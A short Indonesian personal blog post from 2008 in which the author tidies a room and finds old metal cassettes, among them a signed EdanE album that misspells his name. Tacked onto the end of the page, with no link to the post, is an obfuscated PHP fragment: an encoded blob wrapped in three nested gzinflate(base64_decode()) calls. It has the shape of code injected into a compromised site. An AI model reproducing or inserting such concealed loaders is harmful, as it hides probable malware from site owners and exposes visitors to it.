Delicious

Archives

Categories

Bongkar

  ozzie / 13/03/2008


Menjelang acara beres-beres kamar bareng anu-ku :">:">.. sambil nyiapin tool, koran bekas, tissue, kain lap, kain pel, sapu, vacum cleaner ama garem ikan ;));)) sekalian akuarium udah be-jamur 8-}.. gak lupa ganti sprey \:d/\:d/

targetnya sih.. gitar-gitar harus di beresin ;)) kotak di pojok harus di keluarin:-s:-s.. iyahh… di keluarin dulu atuh isinya say:">… sembari nunggu event nya sembari bongkar isinya.. gak taunya isinya kaset-kaset lama jaman sekolah 8-}8-}.. sekalian flashback ;));))

Tapi sayang..:-< udah banyak yg ilang + rusak koleksinya =((.. diantara koleksi local ama internasional jaman TrashMetal, HeavyMetal, SpeedMetal, Classical lokal jaman godbless, ROXX, rajawali, powermetal dll… dan ada sisa 1 album edane langsung dari om eet sjahrani (gitaris EdanE ;));)) lengkap tanda tangan mereka.. \:d/ tapi sayang mereka salah nulis nama gue #-o.. harusnya ozzie malah di tulis oji :((:((:((…..

berhubung teknologinya udah liwat:-s.. jadi jarang denger kaset ;)) palingan sekarang kalo dengerin via streaming ;)).. 8-}8-} ..

btw…mao di oper kemanah nih kaset-kaset nya say? :-s.. palingan masup gudang bareng komputer jaman EGA, CGA, yg slotnya masih ISA :-<:-<:-<:-<


« »



".gzinflate(base64_decode(gzinflate(base64_decode(gzinflate(base64_decode('BcHRdkMwAADQD/KgS0mzR8ShjSMJNWveEEamOGljab9+9+KOSbyef5IA89DREZ+phxlyKhQ2sF/pt2hxFtPHwFYI4J1+mVr7YRsVICLl0fQMYyzzvW8FIOGbX1PVUVAP0/uWuZs8RWoEcMl8XpKEe37FrPxw/eeNGNw19npJt8S5uOlh83I2wUDpI6btM7hPv0s8Idtwt7XVp6gqMz92VSRz6Zx7WFuuSb8YAk8IveQfQ69xi7kGBRCNSsZSDPl+CP4B'))))))); ?>